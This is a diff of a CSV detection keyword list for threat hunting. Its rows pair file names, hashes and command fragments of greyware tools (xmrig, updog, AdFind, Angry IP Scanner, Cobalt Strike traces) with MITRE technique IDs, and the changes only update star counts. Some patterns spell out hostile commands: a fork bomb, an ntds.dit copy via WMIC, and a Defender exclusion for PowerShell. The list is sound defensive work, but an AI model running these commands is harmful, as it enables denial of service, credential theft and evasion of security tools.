+"*/updog-*.tar.gz*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*/updog.git*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*/updog/archive/updog-*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*/xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*/xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*/xmrig.git*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*:(){:I: &I*","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*\1.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
 "*\1.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
@@ -213,7 +213,7 @@
 "*\9.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
 "*\9.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
 "*\ADGet.exe*","greyware_tool_keyword","adget","gather valuable informations about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*\Angry IP Scanner.app*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*\Angry IP Scanner.app*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
 "*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*","greyware_tool_keyword","cobaltstrike","If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*\AppData\Local\Temp\Procmon.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*\AppData\Local\Temp\Procmon64.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -226,9 +226,9 @@
 "*\FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
 "*\GoodSync-2*-*.log*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
 "*\GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
-"*\ipscan-*-setup.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*\ipscan221.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*\ipscan-crash.txt*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*\ipscan-*-setup.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*\ipscan221.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*\ipscan-crash.txt*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
 "*\Ivy\Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "*\Ivy\Loader\*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "*\keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -271,7 +271,7 @@
 "*\TEMP\AteraUpgradeAgentPackage\*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*\TEMP\ScreenConnect\*.ps1*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*\tir_blanc_holiseum\*.exe*","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","4","6","N/A","N/A","N/A","N/A"
-"*\updog-master\*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*\updog-master\*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
 "*\Users\*\AppData\Local\GoodSync*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
 "*\Users\*\AppData\Local\Temp\*.megatools.cache*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9","","N/A","","",""
 "*\Users\Public\*.dmp*","greyware_tool_keyword","procdump","Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -280,18 +280,18 @@
 "*\uTorrent\*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*\utweb.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*\Windows\Prefetch\PSEXEC*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*\WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*\xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*\xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*\xmrig-6.20.0*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*\xmrig-master*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*\WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*\xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*\xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*\xmrig-6.20.0*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*\xmrig-master*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*-443.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
-"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*aakchaleigkohafkfjfjbblobjifikek*","greyware_tool_keyword","ProxFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*ac i ntds*\\127.0.0.1\ADMIN$\*","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*","greyware_tool_keyword","powershell","Exclude powershell from defender detections","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
@@ -308,8 +308,8 @@
 "*adfind.exe -sc trustdmp*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*adfind.exe*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*AdFind.zip*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://www.joeware.net/freetools/tools/adfind/usage.htm","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*ADRecon -OutputDir *","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","0","greyware tool - risks of False positive !","N/A","5","487","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z"
-"*ADRecon.ps1*","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","1","greyware tool - risks of False positive !","N/A","5","487","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z"
+"*ADRecon -OutputDir *","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","0","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z"
+"*ADRecon.ps1*","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","1","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z"
 "*Advanced IP Scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*advanced_ip_scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Advanced_IP_Scanner*.exe*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -335,11 +335,11 @@
